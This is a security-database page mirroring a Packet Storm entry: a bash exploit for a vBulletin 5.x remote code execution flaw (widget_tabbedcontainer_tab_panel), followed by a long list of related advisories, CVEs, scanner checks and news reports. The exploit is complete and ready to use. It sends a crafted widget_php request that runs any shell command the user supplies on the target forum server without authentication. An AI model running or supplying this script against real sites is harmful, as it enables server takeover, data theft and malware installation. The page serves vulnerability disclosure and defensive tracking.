Lucene search
ZenofexPACKETSTORM:158829HistoryAug 11, 2020 - 12:00 a.m.
vBulletin 5.x Remote Code Execution
2020-08-1100:00:00
Zenofex
packetstormsecurity.com
220
`#!/bin/bash
#
# vBulletin (widget_tabbedcontainer_tab_panel) 5.x 0day by @Zenofex
#<br># Usage ./exploit <site> <shell-command><br>
# Urlencode cmd
CMD=`echo $2|perl -MURI::Escape -ne 'chomp;print uri_escape($_),"\n"'`
# Send request
curl -s $1/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("'+$CMD+'");exit;'
`
Related
canvas
canvas
Immunity Canvas: VBULLETIN_WIDGET_RCE
2019-09-24 22:15:00
thn
thn
Hackers Breach ZoneAlarm's Forum Site β Outdated vBulletin to Blame
2019-11-11 15:27:00
exploitdb
exploitdb
vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
2020-08-12 00:00:00
vBulletin 5.x - Remote Command Execution (Metasploit)
2019-09-30 00:00:00
githubexploit
githubexploit
Exploit for Code Injection in Vbulletin
2020-08-31 13:44:15
Exploit for Code Injection in Vbulletin
2020-02-20 23:14:52
Exploit for Code Injection in Vbulletin
2019-09-26 03:56:22
impervablog
impervablog
Attackers Are Quick to Exploit vBulletinβs Latest 0-day Remote Code Execution Vulnerability
2019-09-26 13:43:30
CrimeOps of the KashmirBlack Botnet β Part II
2020-10-22 18:55:05
zdt
zdt
vBulletin 5.5.4 Remote Command Execution Exploit #RCE
2019-12-11 00:00:00
vBulletin 5.6.2 - (widget_tabbedContainer_tab_panel) Remote Code Execution Exploit
2020-08-12 00:00:00
vBulletin 5.x - Remote Command Execution Exploit
2019-10-01 00:00:00
threatpost
threatpost
Rash of Exploits Targets Critical vBulletin RCE Bug
2019-09-26 17:45:03
vBulletin Flaw Exploited in Dutch Sex-Work Forum Breach
2019-10-10 20:37:40
Researcher Publishes Patch Bypass for vBulletin 0-Day
2020-08-11 12:09:30
packetstorm
packetstorm
vBulletin 5.x 0-Day Pre-Auth Remote Command Execution
2019-09-26 00:00:00
vBulletin 5.x Remote Code Execution
2020-08-11 00:00:00
vBulletin 5.x Pre-Auth Remote Code Execution
2019-09-28 00:00:00
cve
cve
openvas
openvas
vBulletin 5.x < 5.5.2 Patch Level 1, 5.5.3 < 5.5.3 Patch Level 1, 5.5.4 < 5.5.4 Patch Level 1 RCE Vulnerability
2019-09-25 00:00:00
vBulletin 5.x RCE Vulnerability
2020-08-10 00:00:00
prion
prion
Cross site request forgery (csrf)
2019-09-24 22:15:00
Design/Logic Flaw
2020-08-12 14:15:00
Design/Logic Flaw
2020-10-30 17:15:00
attackerkb
attackerkb
CVE-2019-16759
2019-09-24 00:00:00
CVE-2020-17496
2020-08-12 00:00:00
CVE-2020-12720 vBulletin incorrect access control
2020-05-08 00:00:00
nessus
nessus
vBulletin 'widget_php' Command Execution
2019-10-23 00:00:00
exploitpack
exploitpack
vBulletin 5.x - Remote Command Execution (Metasploit)
2019-09-30 00:00:00
metasploit
metasploit
cisa_kev
cisa_kev
vBulletin PHP Module Remote Code Execution Vulnerability
2021-11-03 00:00:00
vBulletin PHP Module Remote Code Execution Vulnerability
2021-11-03 00:00:00
checkpoint_advisories
checkpoint_advisories
vBulletin Forum Remote Code Execution (CVE-2019-16759; CVE-2020-17496)
2019-09-25 00:00:00
mssecure
mssecure
Ghost in the shell: Investigating web shell attacks
2020-02-04 17:30:40
nuclei
nuclei
vBulletin 5.5.4 - 5.6.2- Remote Command Execution
2021-02-24 20:00:52
vBulletin 5.0.0-5.5.4 - Remote Command Execution
2020-07-04 15:56:10
qualysblog
qualysblog
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR
2022-02-23 05:39:00
Related for PACKETSTORM:158829